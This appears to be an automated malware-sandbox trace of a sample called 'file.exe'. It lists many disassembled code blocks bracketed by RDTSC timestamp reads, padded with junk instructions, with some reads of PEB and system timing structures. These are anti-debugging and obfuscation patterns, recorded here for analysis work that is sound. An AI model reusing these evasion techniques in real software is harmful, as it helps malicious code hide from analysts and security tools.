Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A72345 second address: A7235B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jns 00007F8A2C7FDC16h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jnc 00007F8A2C7FDC16h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7235B second address: A7235F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7235F second address: A7238A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007F8A2C7FDC29h 0x00000010 js 00007F8A2C7FDC16h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A72777 second address: A72787 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F8A2C4FB296h 0x0000000a jnp 00007F8A2C4FB296h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A72787 second address: A727AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC1Eh 0x00000007 jmp 00007F8A2C7FDC21h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A727AD second address: A727B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A727B3 second address: A727D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F8A2C7FDC25h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A727D4 second address: A727EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F8A2C4FB296h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d pushad 0x0000000e jg 00007F8A2C4FB296h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A727EA second address: A727F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A727F0 second address: A727F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7299F second address: A729A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A72B15 second address: A72B1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A72B1B second address: A72B2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jbe 00007F8A2C7FDC16h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A72B2B second address: A72B35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A72B35 second address: A72B49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8A2C7FDC1Bh 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A72B49 second address: A72B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8A2C4FB2A2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A72B5F second address: A72B7F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8A2C7FDC16h 0x00000008 jmp 00007F8A2C7FDC26h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7370B second address: A7370F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7370F second address: A73713 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A76071 second address: A76088 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F8A2C4FB296h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jl 00007F8A2C4FB296h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7982C second address: A79847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8A2C7FDC22h 0x00000009 popad 0x0000000a pushad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A79847 second address: A7984D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7984D second address: A7986B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007F8A2C7FDC1Dh 0x0000000b jnp 00007F8A2C7FDC16h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7986B second address: A7986F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7986F second address: A79879 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8A2C7FDC16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7E2FD second address: A7E301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A91111 second address: A9113E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F8A2C7FDC21h 0x0000000b popad 0x0000000c jmp 00007F8A2C7FDC22h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9113E second address: A91148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A90F92 second address: A90F9B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edx 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A93115 second address: A93119 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A975F0 second address: A975F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A975F6 second address: A97634 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8A2C4FB2B3h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F8A2C4FB2ACh 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F8A2C4FB29Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B27B second address: A9B285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F8A2C7FDC16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B285 second address: A9B289 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B289 second address: A9B294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B535 second address: A9B546 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jne 00007F8A2C4FB29Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA02BB second address: AA02C5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8A2C7FDC16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA08E5 second address: AA08F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C4FB29Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA08F8 second address: AA094B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F8A2C7FDC18h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 mov edx, 2ED84E2Fh 0x0000002a mov dword ptr [ebp+122D2166h], eax 0x00000030 push dword ptr [ebp+122D25C0h] 0x00000036 mov dword ptr [ebp+122D2166h], eax 0x0000003c call 00007F8A2C7FDC19h 0x00000041 jo 00007F8A2C7FDC20h 0x00000047 push eax 0x00000048 push edx 0x00000049 push ecx 0x0000004a pop ecx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA094B second address: AA095E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c jg 00007F8A2C4FB296h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA095E second address: AA0979 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F8A2C7FDC1Ch 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA0979 second address: AA097D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA097D second address: AA09AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F8A2C7FDC28h 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 popad 0x00000013 mov eax, dword ptr [eax] 0x00000015 pushad 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA09AE second address: AA09B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA09B7 second address: AA09BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA24B6 second address: AA24BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA24BC second address: AA24C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA24C2 second address: AA24D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F8A2C4FB29Bh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA20C4 second address: AA20CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA3FA3 second address: AA3FA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D908D6 second address: 4D908DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D908DC second address: 4D908F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov ah, 49h 0x0000000c mov cx, dx 0x0000000f popad 0x00000010 xchg eax, ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov esi, 45D856C7h 0x00000019 push ecx 0x0000001a pop edx 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D908F8 second address: 4D90927 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 5DF475EAh 0x00000008 mov dx, 06B6h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f call dword ptr [7598188Ch] 0x00000015 mov edi, edi 0x00000017 push ebp 0x00000018 mov ebp, esp 0x0000001a push ecx 0x0000001b mov ecx, dword ptr [7FFE0004h] 0x00000021 mov dword ptr [ebp-04h], ecx 0x00000024 cmp ecx, 01000000h 0x0000002a jc 00007F8A2C82F6F5h 0x00000030 mov eax, 7FFE0320h 0x00000035 mov eax, dword ptr [eax] 0x00000037 mul ecx 0x00000039 shrd eax, edx, 00000018h 0x0000003d mov esp, ebp 0x0000003f pop ebp 0x00000040 ret 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F8A2C7FDC28h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90927 second address: 4D9092D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9092D second address: 4D9081D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c jmp 00007F8A2C7FDC1Eh 0x00000011 ret 0x00000012 nop 0x00000013 xor esi, eax 0x00000015 lea eax, dword ptr [ebp-10h] 0x00000018 push eax 0x00000019 call 00007F8A3118B50Dh 0x0000001e mov edi, edi 0x00000020 jmp 00007F8A2C7FDC22h 0x00000025 xchg eax, ebp 0x00000026 pushad 0x00000027 mov cl, EDh 0x00000029 call 00007F8A2C7FDC23h 0x0000002e mov esi, 3A82618Fh 0x00000033 pop esi 0x00000034 popad 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F8A2C7FDC21h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9081D second address: 4D90823 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90823 second address: 4D90827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90827 second address: 4D9082B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9082B second address: 4D90895 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a jmp 00007F8A2C7FDC25h 0x0000000f mov edi, esi 0x00000011 popad 0x00000012 mov ebp, esp 0x00000014 pushad 0x00000015 mov esi, 37BBB54Fh 0x0000001a pushfd 0x0000001b jmp 00007F8A2C7FDC24h 0x00000020 add ecx, 35AFADF8h 0x00000026 jmp 00007F8A2C7FDC1Bh 0x0000002b popfd 0x0000002c popad 0x0000002d pop ebp 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F8A2C7FDC25h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D700C9 second address: 4D70103 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C4FB2A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F8A2C4FB29Eh 0x0000000f push eax 0x00000010 jmp 00007F8A2C4FB29Bh 0x00000015 xchg eax, ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push edx 0x0000001a pop esi 0x0000001b mov cx, dx 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70103 second address: 4D70109 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70109 second address: 4D7014E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C4FB2A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebx, dword ptr [eax+10h] 0x0000000e jmp 00007F8A2C4FB2A0h 0x00000013 xchg eax, esi 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F8A2C4FB2A7h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D7014E second address: 4D70166 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8A2C7FDC24h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70166 second address: 4D7018E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C4FB29Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8A2C4FB2A4h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D7018E second address: 4D701B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8A2C7FDC25h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D701B5 second address: 4D701BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D701BB second address: 4D701BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D701BF second address: 4D701C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D701C3 second address: 4D701E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [759B06ECh] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8A2C7FDC21h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D701E6 second address: 4D701EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D701EA second address: 4D701F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70307 second address: 4D70339 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 43E4EDFAh 0x00000008 mov cx, dx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e call dword ptr [75980B60h] 0x00000014 mov eax, 75F3E5E0h 0x00000019 ret 0x0000001a jmp 00007F8A2C4FB29Dh 0x0000001f push 00000044h 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F8A2C4FB29Dh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70339 second address: 4D70355 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70355 second address: 4D70368 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C4FB29Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70368 second address: 4D7038F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8A2C7FDC1Fh 0x00000008 movzx esi, di 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov edi, 7122D940h 0x00000017 mov edi, 3AFC496Ch 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D7038F second address: 4D70395 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70395 second address: 4D70399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70399 second address: 4D7039D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D7039D second address: 4D70440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], edi 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F8A2C7FDC26h 0x00000012 add esi, 46A51AB8h 0x00000018 jmp 00007F8A2C7FDC1Bh 0x0000001d popfd 0x0000001e mov dh, al 0x00000020 popad 0x00000021 push dword ptr [eax] 0x00000023 jmp 00007F8A2C7FDC1Bh 0x00000028 mov eax, dword ptr fs:[00000030h] 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007F8A2C7FDC24h 0x00000035 sbb cx, 3448h 0x0000003a jmp 00007F8A2C7FDC1Bh 0x0000003f popfd 0x00000040 popad 0x00000041 push dword ptr [eax+18h] 0x00000044 pushad 0x00000045 pushfd 0x00000046 jmp 00007F8A2C7FDC1Bh 0x0000004b and ch, FFFFFF8Eh 0x0000004e jmp 00007F8A2C7FDC29h 0x00000053 popfd 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D704B9 second address: 4D704E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F8A2C4FB2A3h 0x00000008 pop eax 0x00000009 push edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, 00000000h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push ebx 0x00000019 pop ecx 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D704E2 second address: 4D70562 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi], edi 0x0000000b pushad 0x0000000c mov bx, FBD0h 0x00000010 popad 0x00000011 mov dword ptr [esi+04h], eax 0x00000014 pushad 0x00000015 movsx ebx, cx 0x00000018 movzx ecx, dx 0x0000001b popad 0x0000001c mov dword ptr [esi+08h], eax 0x0000001f pushad 0x00000020 call 00007F8A2C7FDC1Fh 0x00000025 pushfd 0x00000026 jmp 00007F8A2C7FDC28h 0x0000002b sub ax, 5278h 0x00000030 jmp 00007F8A2C7FDC1Bh 0x00000035 popfd 0x00000036 pop ecx 0x00000037 mov ax, dx 0x0000003a popad 0x0000003b mov dword ptr [esi+0Ch], eax 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F8A2C7FDC1Eh 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70562 second address: 4D70591 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8A2C4FB2A1h 0x00000009 xor ecx, 710805C6h 0x0000000f jmp 00007F8A2C4FB2A1h 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70591 second address: 4D705B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [ebx+4Ch] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8A2C7FDC23h 0x00000011 rdtsc
